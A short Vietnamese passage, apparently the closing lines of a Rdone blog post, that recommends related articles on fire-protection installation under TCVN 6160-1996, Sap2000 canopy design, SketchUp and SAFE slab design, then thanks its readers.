nhé! Các bạn có thể tham khảo thêm các bài viết khác về xây dựng tại Rdone Tài liệu lắp đặt phòng cháy chữa cháy theo TCVN 6160 – 1996. Tài liệu tính toán thiết kế mái đón kính bằng Sap2000. Ứng dụng google SketchUp trong thiết kế kiến trúc [Mới nhất]. Thiết kế sàn BTCT bằng SAFE(v12) mới nhất hiện nay. Tài liệu học SketchUp cho người mới bắt đầu sử dụng. Cảm ơn các bạn đã đồng hành cùng Rdone. Chúc các bạn thành công!
Chủ đề nổi bật
Chủ đề hot nhất
Được xem nhiều nhất